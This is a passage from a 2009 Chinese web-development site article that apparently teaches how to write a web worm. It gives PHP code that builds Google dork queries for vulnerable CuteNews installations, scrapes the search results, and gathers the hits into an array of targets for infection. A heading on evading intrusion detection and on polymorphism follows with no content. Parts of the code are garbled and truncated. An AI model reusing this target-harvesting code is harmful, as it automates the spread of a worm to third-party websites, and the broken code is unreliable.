教你编写WEB蠕虫
2009-06-12 16:54:59 来源:WEB开发网 function gather_targets() {
return array("http://localhost/cutenews");
}
基于web蠕虫的意图,通过搜索引擎去寻找潜在的目标是很有必要的。你可以很容易地写出一些请求,并通过URLs让网站执行特定软件。这可以通过网页收集代码来产生一组包含可被worm感染的目标数组,以此实现其自动化。
$search = array("inurl:flood.db.php", ""powered by cutenews v1.3"",
""/cutenews/remote_headlines.php"", ""powered by CuteNews" "2003..2005
CutePHP"", "inurl:"/newsarchive.php?archive"");
$query = $search[rand(0, count($search)-1)];
通过构造HTTP requests,你就可以从搜索引擎中获得搜索结果,然后从返回的网址中寻找合适的目标。
$fp = fsockopen("google.com", "80");
fwrite($fp, "GET /search?q=" . urlencode($query) .
"&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls
=org.mozilla:en-US:official HTTP/1.1rn
Host: www.google.comrn
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)
Gecko/20050511/1.0.4rn
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5rn
Accept-Language: en-us,en;q=0.5rn
Accept-Encoding: gzip,deflatern
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn
Connection: closernrn");
while (!feof($fp) AND (strpos($text, "2005 Google") === false)) {
$text.= fgets($fp);
}
fclose($fp);
while (!(strpos($text, "
$starttext = substr($text, strpos($text, "
$thenumber = substr($starttext, 0, strpos($starttext, """));
$text = str_replace("", "x", $text);
if (strpos($thenumber, "google") === false) $vuln[] = $thenumber;
}
print_r($vuln);
===绕过IDS,多态性和通讯===
- ››编写Linux定时处理程序
- ››web安全之信息刺探防范1
- ››webqq 最新加密算法
- ››webdriver 数据库验证方法
- ››WebSphere Application Server 7.0 XML Feature P...
- ››Web2.0网络时代基于社会影响力的声望值
- ››Web服务器搭建:配置Linux+Apache+Mysql+PHP(或Pe...
- ››编写Linux系统下Daemon程序的方法步骤
- ››WebLogic调整Java虚拟机性能优化参数
- ››webqq2.0协议研究(3)-ClientId生成
- ››Web.config配置文件
- ››WebBrowser组件的execWB方法——Delphi控制浏览器...
更多精彩
赞助商链接